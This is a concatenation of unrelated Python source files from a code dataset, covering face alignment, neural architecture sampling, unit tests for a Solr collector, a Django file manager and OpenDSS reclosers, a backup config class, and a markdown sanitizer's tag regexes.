mv = out0[:, ipass[0]]
w = total_boxes[:, 2] - total_boxes[:, 0] + 1
h = total_boxes[:, 3] - total_boxes[:, 1] + 1
points[0:5, :] = np.tile(w, (5, 1)) * points[0:5, :] + np.tile(total_boxes[:, 0], (5, 1)) - 1
points[5:10, :] = np.tile(h, (5, 1)) * points[5:10, :] + np.tile(total_boxes[:, 1], (5, 1)) - 1
if total_boxes.shape[0] > 0:
total_boxes = self.__bbreg(total_boxes.copy(), np.transpose(mv))
pick = self.__nms(total_boxes.copy(), 0.7, "Min")
total_boxes = total_boxes[pick, :]
points = points[:, pick]
return total_boxes, points.transpose()
@staticmethod
def get_face(img, dst, target_size=(112, 112)):
"""
:param img: image
:param dst:
:param target_size:
:return:
"""
src = np.array(
[
[38.2946, 51.6963],
[73.5318, 51.5014],
[56.0252, 71.7366],
[41.5493, 92.3655],
[70.7299, 92.2041],
],
dtype=np.float32,
)
tform = SimilarityTransform()
tform.estimate(dst, src)
tmatrix = tform.params[0:2, :]
return cv2.warpAffine(img, tmatrix, target_size, borderValue=0.0)
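# A minimal end-to-end sketch of how FaceDetection and FaceRecognition fit
# together (illustrative only, not part of the original module; "my_image.jpg"
# is a placeholder path, and the first run downloads the tflite models):
if __name__ == "__main__":
    bgr = cv2.imread("my_image.jpg").astype(np.float32)    # BGR, float32 [0..255]
    detector = FaceDetection()
    recognizer = FaceRecognition()
    for bbox, points, det_conf in detector.detect_faces(bgr):
        aligned = detector.get_face(bgr, points)            # aligned 112x112 BGR crop
        rgb = cv2.cvtColor(aligned / 255, cv2.COLOR_BGR2RGB)
        emb = recognizer.get_emb(np.expand_dims(rgb, axis=0))[0]
        print("face conf %.2f -> embedding shape %s" % (det_conf, emb.shape))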
|
StarcoderdataPython
|
4962561
|
<reponame>apourchot/to_share_or_not_to_share<filename>models/nasbench_201/graph_sampler.py
import pickle
import numpy as np
class GraphSampler(object):
"""
Sample architectures uniformly from available dataset
"""
def __init__(self, dataset_path, **kwargs):
super(GraphSampler, self).__init__()
# load dataset
with open(dataset_path, "rb") as f:
self.dataset = pickle.load(f)
print("Number of architectures: {}".format(len(self.dataset)))
# build probs
self.probs = np.ones(len(self.dataset))
self.probs = self.probs / np.sum(self.probs)
print("Probs: ", self.probs)
def sample(self, n_monte=1, return_metrics=False):
"""
Samples n_monte architecture
:param n_monte:
:param return_metrics: whether to return the metrics associated with the architecture
:return: a list of matrices and operations describing
the sampled architecture
"""
matrices = []
metrics = []
# sampling an architecture n_monte times
for n in range(n_monte):
# sampling datum
data = self.dataset[np.random.choice(len(self.dataset), p=self.probs)]
# matrix used for all tasks
matrix = data["architecture"]
matrices.append(matrix)
# append metrics if necessary
if return_metrics:
metrics.append(data)
if return_metrics:
return list(zip(matrices, metrics))
return list(matrices)
def get(self, n, return_metrics):
"""
Returns the nth architecture
:param n:
:param return_metrics: whether to return the metrics associated with the architecture
:return: a list of matrices and operations describing
the sampled architecture
"""
assert n < len(self.dataset)
matrices = []
metrics = []
# sampling datum
data = self.dataset[n]
# matrix used for all tasks
matrix = data["architecture"]
matrices.append(matrix)
# append metrics if necessary
if return_metrics:
metrics.append(data)
if return_metrics:
return list(zip(matrices, metrics))
return list(matrices)
def get_all(self, return_metrics):
matrices = []
metrics = None
if return_metrics:
metrics = []
# sampling an architecture n_monte times
for n in range(len(self.dataset)):
# sampling datum
data = self.dataset[n]
# matrix used for all tasks
matrix = data["architecture"]
matrices.append(matrix)
# append metrics if necessary
if return_metrics:
metrics.append(data)
if return_metrics:
return list(zip(matrices, metrics))
return list(matrices)
def get_random_perm(self):
return np.random.permutation(range(len(self.dataset)))
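# Minimal usage sketch (illustrative only; "nasbench_201.pkl" is a placeholder
# for a pickled list of dicts that each carry an "architecture" entry, which is
# what __init__ and sample() expect):
if __name__ == "__main__":
    sampler = GraphSampler(dataset_path="nasbench_201.pkl")
    matrices = sampler.sample(n_monte=4)
    print("sampled {} architecture matrices".format(len(matrices)))
    for matrix, metrics in sampler.sample(n_monte=1, return_metrics=True):
        print("metrics keys:", list(metrics.keys()))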
|
StarcoderdataPython
|
141505
|
#!/usr/bin/python
# coding=utf-8
##########################################################################
from test import CollectorTestCase
from test import get_collector_config
from test import unittest
from mock import Mock
from mock import patch
from diamond.collector import Collector
from solr import SolrCollector
##########################################################################
class TestSolrCollector(CollectorTestCase):
def setUp(self):
config = get_collector_config('SolrCollector', {})
self.collector = SolrCollector(config, None)
def test_import(self):
self.assertTrue(SolrCollector)
@patch.object(Collector, 'publish')
def test_should_work_with_real_data(self, publish_mock):
returns = [self.getFixture('cores'),
self.getFixture('ping'),
self.getFixture('stats'),
self.getFixture('system')]
urlopen_mock = patch('urllib2.urlopen', Mock(
side_effect=lambda *args: returns.pop(0)))
urlopen_mock.start()
self.collector.collect()
urlopen_mock.stop()
metrics = {
'response.QueryTime': 5,
'response.Status': 0,
"core.maxDoc": 321,
"core.numDocs": 184,
"core.warmupTime": 0,
"queryhandler.standard.requests": 3,
"queryhandler.standard.errors": 0,
"queryhandler.standard.timeouts": 0,
"queryhandler.standard.totalTime": 270,
"queryhandler.standard.avgTimePerRequest": 90,
"queryhandler.standard.avgRequestsPerSecond": 0.00016776958,
"queryhandler.replication.requests": 2105,
"queryhandler.replication.errors": 0,
"queryhandler.replication.timeouts": 0,
"queryhandler.replication.totalTime": 17982.93376,
"queryhandler.replication.avgTimePerRequest": 8.542961406175772,
"queryhandler.replication.avgRequestsPerSecond": 0.16194770586582,
"queryhandler.update.requests": 0,
"queryhandler.update.errors": 0,
"queryhandler.update.timeouts": 0,
"queryhandler.update.totalTime": 0,
"queryhandler.update.avgRequestsPerSecond": 0,
"updatehandler.commits": 0,
"updatehandler.autocommits": 0,
"updatehandler.optimizes": 0,
"updatehandler.rollbacks": 0,
"updatehandler.docsPending": 0,
"updatehandler.adds": 0,
"updatehandler.errors": 0,
"updatehandler.cumulative_adds": 0,
"updatehandler.cumulative_errors": 0,
'cache.fieldValueCache.lookups': 0,
'cache.fieldValueCache.hits': 0,
'cache.fieldValueCache.hitratio': 0.0,
'cache.fieldValueCache.inserts': 0,
'cache.fieldValueCache.evictions': 0,
'cache.fieldValueCache.size': 0,
'cache.fieldValueCache.warmupTime': 0,
'cache.fieldValueCache.cumulative_lookups': 0,
'cache.fieldValueCache.cumulative_hits': 0,
'cache.fieldValueCache.cumulative_hitratio': 0.0,
'cache.fieldValueCache.cumulative_inserts': 0,
'cache.fieldValueCache.cumulative_evictions': 0,
'cache.filterCache.lookups': 0,
'cache.filterCache.hits': 0,
'cache.filterCache.hitratio': 0.0,
'cache.filterCache.inserts': 0,
'cache.filterCache.evictions': 0,
'cache.filterCache.size': 0,
'cache.filterCache.warmupTime': 0,
'cache.filterCache.cumulative_lookups': 0,
'cache.filterCache.cumulative_hits': 0,
'cache.filterCache.cumulative_hitratio': 0.0,
'cache.filterCache.cumulative_inserts': 0,
'cache.filterCache.cumulative_evictions': 0,
'cache.documentCache.lookups': 0,
'cache.documentCache.hits': 0,
'cache.documentCache.hitratio': 0.0,
'cache.documentCache.inserts': 0,
'cache.documentCache.evictions': 0,
'cache.documentCache.size': 0,
'cache.documentCache.warmupTime': 0,
'cache.documentCache.cumulative_lookups': 0,
'cache.documentCache.cumulative_hits': 0,
'cache.documentCache.cumulative_hitratio': 0.0,
'cache.documentCache.cumulative_inserts': 0,
'cache.documentCache.cumulative_evictions': 0,
'cache.queryResultCache.lookups': 3,
'cache.queryResultCache.hits': 2,
'cache.queryResultCache.hitratio': 0.66,
'cache.queryResultCache.inserts': 1,
'cache.queryResultCache.evictions': 0,
'cache.queryResultCache.size': 1,
'cache.queryResultCache.warmupTime': 0,
'cache.queryResultCache.cumulative_lookups': 3,
'cache.queryResultCache.cumulative_hits': 2,
'cache.queryResultCache.cumulative_hitratio': 0.66,
'cache.queryResultCache.cumulative_inserts': 1,
'cache.queryResultCache.cumulative_evictions': 0,
'jvm.mem.free': 42.7,
'jvm.mem.total': 61.9,
'jvm.mem.max': 185.6,
'jvm.mem.used': 19.2,
}
self.setDocExample(collector=self.collector.__class__.__name__,
metrics=metrics)
self.assertPublishedMany(publish_mock, metrics)
@patch.object(Collector, 'publish')
def test_should_fail_gracefully(self, publish_mock):
urlopen_mock = patch('urllib2.urlopen', Mock(
return_value=self.getFixture('stats_blank')))
urlopen_mock.start()
self.collector.collect()
urlopen_mock.stop()
self.assertPublishedMany(publish_mock, {})
##########################################################################
if __name__ == "__main__":
unittest.main()
|
StarcoderdataPython
|
8056765
|
<gh_stars>10-100
import jsonschema
import kayvee
import logging
schema = {
"type": "object",
"name": "Volume backup schedule",
"properties": {
"max_snapshots": {"type": "number"},
"interval": {"type": "string"},
"name": {"type": "string"},
},
"additionalProperties": False,
}
class BackupConfig:
"""
Interface shared by backup configs
Config items are dicts, with key equal to the volume id mapped to a dict of
parameters
{
"vol-1234567" : {
"interval": "daily",
"max_snapshots": 7,
"name": "events-db",
...
},
...
}
"""
path = None
@classmethod
def _validate_config(cls, new_config):
""" Raises exception if config loaded from file doesn't match expected schema """
assert type(new_config) is dict
for key, val in new_config.iteritems():
jsonschema.validate(val, schema)
def get(self):
""" Get a dict of config items """
try:
new_config = self.refresh()
self._validate_config(new_config)
self.config = new_config
except Exception as e:
logging.warning(kayvee.formatLog("ebs-snapshots", "warning", "unable to load backup config", {"path": self.path, "error": str(e)}))
return self.config
def refresh(self):
""" returns config dict, after being updated """
raise NotImplementedError("refresh() must be implemented in subclasses")
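# The class above leaves refresh() abstract. A minimal file-backed subclass might
# look like the sketch below (illustrative only, not part of the original module;
# the JSON file is assumed to hold a dict matching the schema defined above):
class FileBackupConfig(BackupConfig):
    """Reads the volume backup schedule from a local JSON file."""

    def __init__(self, path):
        self.path = path
        self.config = {}

    def refresh(self):
        import json
        with open(self.path) as f:
            return json.load(f)

# Example (placeholder path): FileBackupConfig("/etc/ebs-snapshots/backup.json").get()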
|
StarcoderdataPython
|
3326336
|
from unittest.mock import patch, mock_open
from django.test import TestCase
# Import module
from backend.file_manager import *
METADATA_EXAMPLE = "59°23'19.2\"N 17°55'35.4\"E (59.388668, 17.926501)\n2018-09-06 15:45:59.603 " \
"(2018-09-06 15:45:59)\n(Test camera name)"
class GetSourceFolders(TestCase):
def setUp(self) -> None:
"""
Set up a complex file structure.
"""
self.rf = Folder.objects.create(path='home/user/', name='test_folder')
self.sf = Folder.objects.create(path='home/user/test_folder/', name='test_subfolder')
self.p = Project.objects.create(name="test_project")
@patch('backend.file_manager.get_subfolders_to_entries')
def test_basic_call(self, mock_get_subfolders_to_entries):
"""
Test simple call.
"""
mock_get_subfolders_to_entries.return_value = [self.sf]
code, res = get_source_folders(data={PROJECT_ID: self.p.id})
mock_get_subfolders_to_entries.assert_called_once()
self.assertEqual(code, 200)
self.assertEqual(len(res[FOLDERS]), 1)
self.assertEqual(len(res[FOLDER_IDS]), 0)
class GetFoldersTest(TestCase):
def setUp(self) -> None:
"""
Set up a complex file structure.
"""
self.rf = Folder.objects.create(path='home/user/', name='test_folder')
self.sf = Folder.objects.create(path='home/user/test_folder/', name='test_subfolder')
@patch('backend.file_manager.get_subfolders_recursive')
@patch('backend.file_manager.get_folders_in_project')
def test_basic_call(self, mock_get_folders_in_project, mock_get_subfolders_recursive):
"""
Test with a complex file structure.
"""
mock_get_folders_in_project.return_value = [self.rf]
mock_get_subfolders_recursive.return_value = [self.sf]
code, res = get_folders(data={PROJECT_ID: 1})
mock_get_folders_in_project.assert_called_once_with(pid=1)
mock_get_subfolders_recursive.assert_called_once_with(fid=self.rf.id)
self.assertEqual(code, 200)
self.assertEqual(len(res[FOLDERS]), 2)
@patch('backend.file_manager.get_subfolders_recursive')
@patch('backend.file_manager.get_folders_in_project')
def test_redundant_parameter(self, mock_get_folders_in_project, mock_get_subfolders_recursive):
"""
Test with a redundant parameter.
"""
mock_get_folders_in_project.return_value = [self.rf]
mock_get_subfolders_recursive.return_value = [self.sf]
code, res = get_folders(data={PROJECT_ID: 1, FOLDER_ID: 42})
mock_get_folders_in_project.assert_called_once_with(pid=1)
mock_get_subfolders_recursive.assert_called_once_with(fid=self.rf.id)
self.assertEqual(code, 200)
self.assertEqual(len(res[FOLDERS]), 2)
def test_missing_parameter(self):
"""
Test with a missing parameter.
"""
code, res = get_folders(data={FOLDER_ID: 42})
self.assertEqual(code, 400)
self.assertEqual(res, {})
def test_non_existing_project(self):
"""
Test with a project id that doesn't exist.
"""
code, res = get_folders(data={PROJECT_ID: 42})
self.assertEqual(code, 204)
self.assertEqual(res, {})
class AddFoldersTest(TestCase):
@patch('backend.file_manager.get_source_folders')
@patch('backend.file_manager.add_folder_to_project')
def test_simple_call(self, mock_add_folder_to_project, mock_get_source_folders):
"""
Test adding a folder to a project.
"""
res = add_folder({PROJECT_ID: 42, FOLDER_ID: 1337})
mock_add_folder_to_project.assert_called_once_with(fid=1337, pid=42)
mock_get_source_folders.assert_called_once_with(data={PROJECT_ID: 42, FOLDER_ID: 1337})
self.assertEqual(res, mock_get_source_folders.return_value)
def test_missing_parameter(self):
"""
Test with a missing parameter.
"""
code, res = add_folder({FOLDER_ID: 1337})
self.assertEqual(code, 400)
self.assertEqual(res, {})
class RemoveFoldersTest(TestCase):
@patch('backend.file_manager.get_source_folders')
@patch('backend.file_manager.delete_folder_from_project')
def test_simple_call(self, mock_delete_folder_from_project, mock_get_source_folders):
"""
        Test removing a folder from a project.
"""
res = remove_folder({PROJECT_ID: 42, FOLDER_ID: 1337})
mock_delete_folder_from_project.assert_called_once_with(fid=1337, pid=42)
mock_get_source_folders.assert_called_once_with(data={PROJECT_ID: 42, FOLDER_ID: 1337})
self.assertEqual(res, mock_get_source_folders.return_value)
def test_missing_parameter(self):
"""
Test with a missing parameter.
"""
code, res = remove_folder({FOLDER_ID: 1337})
self.assertEqual(code, 400)
self.assertEqual(res, {})
class GetClipsTest(TestCase):
def setUp(self) -> None:
"""
Set up a file structure.
"""
self.resolution = Resolution.objects.get_or_create(width=256, height=240)[0]
self.cm_name = 'Test camera name'
self.lon = Decimal('0.42')
self.lat = Decimal('42.0')
self.st = timezone.datetime(2020, 1, 17, tzinfo=pytz.timezone(settings.TIME_ZONE))
self.et = timezone.datetime(2020, 1, 18, tzinfo=pytz.timezone(settings.TIME_ZONE))
self.rf = Folder.objects.create(path='home/user/', name='test_folder')
self.ca = Camera.objects.create(name=self.cm_name, longitude=self.lon, latitude=self.lat)
self.cl = Clip.objects.create(folder=self.rf, name='test_clip', video_format='mkv', start_time=self.st,
end_time=self.et, camera=self.ca, frame_rate=42.0, resolution=self.resolution)
@patch('backend.file_manager.get_all_clips_in_project')
def test_basic_call(self, mock_get_all_clips_in_project):
"""
Test with a complex file structure.
"""
mock_get_all_clips_in_project.return_value = [self.cl]
code, res = get_clips(data={PROJECT_ID: 1})
mock_get_all_clips_in_project.assert_called_once_with(pid=1)
self.assertEqual(code, 200)
self.assertEqual(len(res[CLIPS]), 1)
def test_missing_parameter(self):
"""
Test with a missing parameter.
"""
code, res = get_clips(data={})
self.assertEqual(code, 400)
self.assertEqual(res, {})
def test_non_existing_project(self):
"""
Test with a project id that doesn't exist.
"""
code, res = get_clips(data={PROJECT_ID: 42})
self.assertEqual(code, 204)
self.assertEqual(res, {})
class GetFilesTest(TestCase):
@patch('backend.file_manager.get_clips')
@patch('backend.file_manager.get_folders')
def test_basic_call(self, mock_get_folders, mock_get_clips):
"""
Test that get_folders and get_clips are called.
"""
mock_get_folders.return_value = (200, {})
mock_get_clips.return_value = (200, {})
get_files(data={PROJECT_ID: 42})
mock_get_folders.assert_called_once_with(data={PROJECT_ID: 42})
mock_get_clips.assert_called_once_with(data={PROJECT_ID: 42})
class BuildFileStructureTest(TestCase):
@patch('backend.file_manager.create_root_folder')
@patch('backend.file_manager.traverse_subfolders')
@patch('backend.file_manager.os.path.isdir')
@patch('backend.file_manager.os.path.dirname')
@patch('backend.file_manager.os.path.basename')
def test_function(self, mock_basename, mock_dirname, mock_isdir, mock_traverse_subfolders, mock_create_root_folder):
"""
        Test that create_root_folder and traverse_subfolders are called with appropriate arguments.
"""
mock_basename.return_value = 'test_folder'
mock_dirname.return_value = 'home/user'
mock_isdir.return_value = True
mock_traverse_subfolders.return_value = None
mock_create_root_folder.return_value = 1337
build_file_structure('home/user/test_folder')
mock_isdir.assert_called_once_with('home/user/test_folder')
mock_create_root_folder.assert_called_once_with(path='home/user/', name='test_folder')
mock_traverse_subfolders.assert_called_once_with(path='home/user/test_folder', parent_id=1337)
class TraverseSubfoldersTest(TestCase):
# Hard to test because behavior is dependent on OS.
@patch('os.scandir')
def test_function(self, mock_os_scandir):
"""
Test that scandir is called with correct argument.
"""
mock_os_scandir.return_value = []
traverse_subfolders(path='home/user/test_folder', parent_id=1337)
mock_os_scandir.assert_called_with('home/user/test_folder')
class AnalyzeFileTest(TestCase):
def test_get_name(self):
"""
Test getting the name from a file (str).
"""
self.assertEqual(analyze_file(file='filename.suffix')[1], 'filename')
def test_get_suffix(self):
"""
Test getting the suffix from a file (str).
"""
self.assertEqual(analyze_file(file='filename.suffix')[2], 'suffix')
def test_bad_file(self):
"""
Test that ValueError is raised when a bad file is given.
"""
self.assertRaises(ValueError, analyze_file, file='filename_no_suffix')
def test_is_clip(self):
"""
Test checking if a file is a clip.
"""
for vf in VIDEO_FORMATS:
self.assertTrue(analyze_file(file='filename.{0}'.format(vf))[0])
self.assertFalse(analyze_file(file='filename.fake')[0])
class GetClipInfoTest(TestCase):
def setUp(self) -> None:
self.cm_name = 'Test camera name'
self.lat = Decimal('42.0')
self.lon = Decimal('0.42')
self.st = timezone.datetime(year=2018, month=9, day=6, hour=15, minute=45, second=59,
tzinfo=pytz.timezone(settings.TIME_ZONE))
self.et = timezone.datetime(year=2018, month=9, day=6, hour=15, minute=46, second=41,
tzinfo=pytz.timezone(settings.TIME_ZONE)) # duration = 42
@patch('backend.file_manager.get_clip_details')
@patch('backend.file_manager.parse_metadata')
def test_valid_clip(self, mock_parse_metadata, mock_get_clip_details):
"""
Test with valid clip.
"""
mock_parse_metadata.return_value = (self.lat, self.lon, self.st, self.cm_name)
mock_get_clip_details.return_value = (42, 1337, 256, 240)
res = get_clip_info(file_path='home/user/test_folder/test_clip.avi', folder_id=1337, name='test_clip',
video_format='avi')
self.assertEqual(res, {'fid': 1337, 'clip_name': 'test_clip', 'video_format': 'avi', 'start_time': self.st,
'end_time': self.et, 'latitude': self.lat, 'longitude': self.lon, 'width': 256,
'height': 240, 'frame_rate': 1337, 'camera_name': 'Test camera name'})
def test_non_existing_clip(self):
"""
Test with non existing clip.
"""
self.assertRaises(FileNotFoundError, get_clip_info, file_path='home/user/test_folder/test_clip.avi',
folder_id=1337, name='test_clip', video_format='avi')
class ParseMetadataTest(TestCase):
@patch('builtins.open', new_callable=mock_open, read_data=METADATA_EXAMPLE)
def test_with_example_data(self, mock_file):
"""
Test parsing an example metadata file.
"""
lat, lon, st, cm_name = parse_metadata(file_path='home/user/test_folder/test_clip.avi')
self.assertEqual(lat, Decimal('59.388668'))
self.assertEqual(lon, Decimal('17.926501'))
self.assertEqual(st, timezone.datetime(year=2018, month=9, day=6, hour=15, minute=45, second=59,
tzinfo=pytz.timezone(settings.TIME_ZONE)))
self.assertEqual(cm_name, 'Test camera name')
mock_file.assert_called_once_with(file='home/user/test_folder/test_clip.avi.txt', errors='ignore', mode='r')
def test_non_existing_file(self):
"""
Test parsing a non existing file. Should give FileNotFoundError.
"""
self.assertRaises(FileNotFoundError, parse_metadata, file_path='home/user/test_folder/test_clip.avi')
@patch('builtins.open', new_callable=mock_open, read_data=METADATA_EXAMPLE + "\nBAD DATA (1337, 42)")
def test_extra_parenthesis_in_metadata(self, mock_file):
"""
Test parsing metadata with extra parentheses. Should give ValueError.
"""
self.assertRaises(ValueError, parse_metadata, file_path='home/user/test_folder/test_clip.avi')
@patch('builtins.open', new_callable=mock_open, read_data="2018-09-06 15:45:59.603 (2018-09-06 15:45:59)"
"59°23'19.2\"N 17°55'35.4\"E (59.388668, 17.926501)"
"\n(Test camera name)")
def test_wrong_order_of_metadata(self, mock_file):
"""
Test parsing metadata with location and time in reversed order. Should give ValueError.
"""
self.assertRaises(ValueError, parse_metadata, file_path='home/user/test_folder/test_clip.avi')
@patch('builtins.open', new_callable=mock_open, read_data="59°23'19.2\"N 17°55'35.4\"E (59.38, 17.9, 42.0)\n"
"2018-09-06 15:45:59.603 (2018-09-06 15:45:59)\n"
"(Test camera name)")
def test_extra_location_value_of_metadata(self, mock_file):
"""
Test parsing metadata. Should give ValueError.
"""
self.assertRaises(ValueError, parse_metadata, file_path='home/user/test_folder/test_clip.avi')
@patch('builtins.open', new_callable=mock_open, read_data="59°23'19.2\"N 17°55'35.4\"E (59.388668, 17.926501)\n"
"2018-09-06 25:45:59.603 (2018-09-06 25:45:59)\n"
"(Test camera name)")
def test_wrong_datetime_format(self, mock_file):
"""
Test parsing metadata. Should give ValueError.
"""
self.assertRaises(ValueError, parse_metadata, file_path='home/user/test_folder/test_clip.avi')
@patch('builtins.open', new_callable=mock_open, read_data="59°23'19.2\"N 17°55'35.4\"E (59.388668, 17.926501)\n"
"2018-09-06 25:45:59.603 (2018-09-06 25:45:59)")
def test_missing_camera_name(self, mock_file):
"""
Test parsing metadata. Should give ValueError.
"""
self.assertRaises(ValueError, parse_metadata, file_path='home/user/test_folder/test_clip.avi')
def cap_get(x):
"""
Function used to mimic the behaviour of VideoCapture.get.
:param x: Given argument.
"""
if x == cv2.CAP_PROP_FPS:
return 42
elif x == cv2.CAP_PROP_FRAME_COUNT:
return 1337.0
elif x == cv2.CAP_PROP_FRAME_WIDTH:
return 256
elif x == cv2.CAP_PROP_FRAME_HEIGHT:
return 240
class GetClipDetailsTest(TestCase):
@patch('backend.file_manager.os.path.isfile')
@patch('backend.file_manager.cv2.VideoCapture')
def test_valid_clip(self, mock_cap, mock_isfile):
"""
Test getting details of a clip. Should round down for duration.
"""
mock_isfile.return_value = True
mock_cap.return_value.get.side_effect = cap_get
self.assertEqual(get_clip_details('home/user/test_folder/test_clip.avi'), (31, 42, 256, 240))
mock_cap.assert_called_once_with('home/user/test_folder/test_clip.avi')
def test_non_existing_clip(self):
"""
Test calling function with non existing clip.
"""
self.assertRaises(FileNotFoundError, get_clip_details, file_path='home/user/test_folder/no_clip.avi')
|
StarcoderdataPython
|
3218619
|
<reponame>davilamds/py_dss_interface<filename>tests/py_dss_interface/test_reclosers.py
# -*- coding: utf-8 -*-
# @Time : 09/07/2021 02:16 AM
# @Author : <NAME>
# @Email : <EMAIL>
# @File : test_reclosers.py
# @Software : VSCode
import pytest
class TestReclosers13Bus:
@pytest.fixture(autouse=True)
def _request(self, solve_snap_13bus):
self.dss = solve_snap_13bus
self.dss.text(r"New 'Recloser.cb1' MonitoredObj=Line.650632 "
r"MonitoredTerm=1 "
r"NumFast=4 "
r"PhaseFast=Ext_Inv "
r"PhaseDelayed=Ext_Inv "
r"PhaseTrip=800 "
r"TDPhFast=1 "
r"TDPhDelayed=1 "
r"PhaseInst=2400 "
r"GroundFast=Ext_Inv "
r"GroundDelayed=Ext_Inv "
r"GroundTrip=800 "
r"TDGrFast=1 "
r"TDGrDelayed=1 "
r"GroundInst=1200 "
r"Shots=4 "
r"RecloseIntervals=(0.5, 2, 2, )")
self.dss.text(r"New 'Recloser.cb2' MonitoredObj=Line.684611 "
r"MonitoredTerm=2 "
r"NumFast=4 "
r"PhaseFast=Ext_Inv "
r"PhaseDelayed=Ext_Inv "
r"PhaseTrip=800 "
r"TDPhFast=1 "
r"TDPhDelayed=1 "
r"PhaseInst=2400 "
r"GroundFast=Ext_Inv "
r"GroundDelayed=Ext_Inv "
r"GroundTrip=800 "
r"TDGrFast=1 "
r"TDGrDelayed=1 "
r"GroundInst=1200 "
r"Shots=4 "
r"RecloseIntervals=(0.5, 2, 2, )")
self.dss.solution_solve()
self.dss.reclosers_write_name('cb1')
# ===================================================================
# Integer methods
# ===================================================================
def test_reclosers_count(self):
expected = 2
actual = self.dss.reclosers_count()
assert expected == actual
def test_reclosers_first(self):
expected = 1
actual = self.dss.reclosers_first()
assert expected == actual
def test_reclosers_next(self):
expected = 2
actual = self.dss.reclosers_next()
assert expected == actual
def test_reclosers_read_monitored_term(self):
expected = 1
actual = self.dss.reclosers_read_monitored_term()
assert expected == actual
def test_reclosers_write_monitored_term(self):
expected = 2
self.dss.reclosers_write_monitored_term(expected)
actual = self.dss.reclosers_read_monitored_term()
assert expected == actual
def test_reclosers_read_switched_term(self):
expected = 1
actual = self.dss.reclosers_read_switched_term()
assert expected == actual
def test_reclosers_write_switched_term(self):
expected = 2
self.dss.reclosers_write_switched_term(expected)
actual = self.dss.reclosers_read_switched_term()
assert expected == actual
def test_reclosers_read_num_fast(self):
expected = 4
actual = self.dss.reclosers_read_num_fast()
assert expected == actual
def test_reclosers_write_num_fast(self):
expected = 1
self.dss.reclosers_write_num_fast(expected)
actual = self.dss.reclosers_read_num_fast()
assert expected == actual
def test_reclosers_read_shots(self):
expected = 4
actual = self.dss.reclosers_read_shots()
assert expected == actual
def test_reclosers_write_shots(self):
expected = 3
self.dss.reclosers_write_shots(expected)
actual = self.dss.reclosers_read_shots()
assert expected == actual
def test_reclosers_open(self):
expected = 0
actual = self.dss.reclosers_open()
assert expected == actual
def test_reclosers_close(self):
expected = 0
actual = self.dss.reclosers_close()
assert expected == actual
def test_reclosers_read_idx(self):
expected = 1
actual = self.dss.reclosers_read_idx()
assert expected == actual
def test_reclosers_write_idx(self):
expected = 2
self.dss.reclosers_write_idx(expected)
actual = self.dss.reclosers_read_idx()
assert expected == actual
# ===================================================================
# Float methods
# ===================================================================
def test_reclosers_read_phase_trip(self):
expected = 800
actual = self.dss.reclosers_read_phase_trip()
assert expected == actual
def test_reclosers_write_phase_trip(self):
expected = 700
self.dss.reclosers_write_phase_trip(expected)
actual = self.dss.reclosers_read_phase_trip()
assert expected == actual
def test_reclosers_read_phase_inst(self):
expected = 2400
actual = self.dss.reclosers_read_phase_inst()
assert expected == actual
def test_reclosers_write_phase_inst(self):
expected = 1200
self.dss.reclosers_write_phase_inst(expected)
actual = self.dss.reclosers_read_phase_inst()
assert expected == actual
def test_reclosers_read_ground_trip(self):
expected = 800
actual = self.dss.reclosers_read_ground_trip()
assert expected == actual
def test_reclosers_write_ground_trip(self):
expected = 700
self.dss.reclosers_write_ground_trip(expected)
actual = self.dss.reclosers_read_ground_trip()
assert expected == actual
def test_reclosers_read_ground_inst(self):
expected = 1200
actual = self.dss.reclosers_read_ground_inst()
assert expected == actual
def test_reclosers_write_ground_inst(self):
expected = 1900
self.dss.reclosers_write_ground_inst(expected)
actual = self.dss.reclosers_read_ground_inst()
assert expected == actual
# ===================================================================
# String methods
# ===================================================================
def test_reclosers_read_name(self):
expected = 'cb1'
actual = self.dss.reclosers_read_name()
assert expected == actual
def test_reclosers_write_name(self):
expected = 'cb2'
self.dss.reclosers_write_name(expected)
actual = self.dss.reclosers_read_name()
assert expected == actual
def test_reclosers_read_monitored_obj(self):
expected = 'line.650632'
actual = self.dss.reclosers_read_monitored_obj()
assert expected == actual
def test_reclosers_write_monitored_obj(self):
expected = 'line.684652'
self.dss.reclosers_write_monitored_obj(expected)
actual = self.dss.reclosers_read_monitored_obj()
assert expected == actual
def test_reclosers_read_switched_obj(self):
expected = 'line.650632'
actual = self.dss.reclosers_read_switched_obj()
assert expected == actual
def test_reclosers_write_switched_obj(self):
expected = 'line.684652'
self.dss.reclosers_write_switched_obj(expected)
actual = self.dss.reclosers_read_switched_obj()
assert expected == actual
# ===================================================================
# Variant methods
# ===================================================================
def test_reclosers_all_names(self):
expected = ['cb1', 'cb2']
actual = self.dss.reclosers_all_names()
assert expected == actual
def test_reclosers_reclose_intervals(self):
expected = [0.5, 2, 2]
actual = self.dss.reclosers_reclose_intervals()
assert expected == actual
|
StarcoderdataPython
|
8078907
|
import os
import numpy as np
import torch
import torch.nn as nn
try:
    # allow_pickle is required on newer numpy versions to load a pickled dict
    dictionary = np.load('grid_embedding.npy', allow_pickle=True).item()
    print("[Dictionary] Loading Existing Embedding Dictionary")
except IOError as e:
    dictionary = {'new': -1}
    print("[Dictionary] Building New Word Embedding Dictionary")
#word = ['hello','world','everyone','good','morning','new','world2','good','bad','good','ki']
word = ['ello','wod','evne','od','morn','new','wod2','gd','bad','good','ki']
word = ['el','wo','vne','o','mon','nw','wod2','gd','bad','go','ki']
dictionary_size = 100
for i in range(0, 11):
    if dictionary.get(word[i], -1) == -1:
        dictionary.update({word[i]: float(len(dictionary) + 1) / dictionary_size})
    print(word[i])
    print(dictionary[word[i]])
    #FT=torch.FloatTensor([dictionary[word[i]]]).new_full()
    expand = np.full((10, 10), dictionary[word[i]])
    tensor_expand = torch.from_numpy(expand)
    print(tensor_expand)
np.save('grid_embedding.npy', dictionary)
print(dictionary)
|
StarcoderdataPython
|
6444555
|
"""
Content rendering functionality
Note that this module is designed to imitate the front end behavior as
implemented in Markdown.Sanitizer.js.
"""
import re
import markdown
# These patterns could be more flexible about things like attributes and
# whitespace, but this is imitating Markdown.Sanitizer.js, so it uses the
# patterns defined therein.
TAG_PATTERN = re.compile(r"<[^>]*>?")
SANITIZED_TAG_PATTERN = re.compile(r"<(/?)(\w+)[^>]*>")
ALLOWED_BASIC_TAG_PATTERN = re.compile(
r"^(</?(b|blockquote|code|del|dd|dl|dt|em|h1|h2|h3|i|kbd|li|ol|p|pre|s|sup|sub|strong|strike|ul)>|<(br|hr)\s?/?>)$"
)
ALLOWED_A_PATTERN = re.compile(
r'^(<a\shref="((https?|ftp)://|/)[-A-Za-z0-9+&@#/%?=~_|!:,.;\(\)]+"(\stitle="[^"<>]+")?\s?>|</a>)$'
)
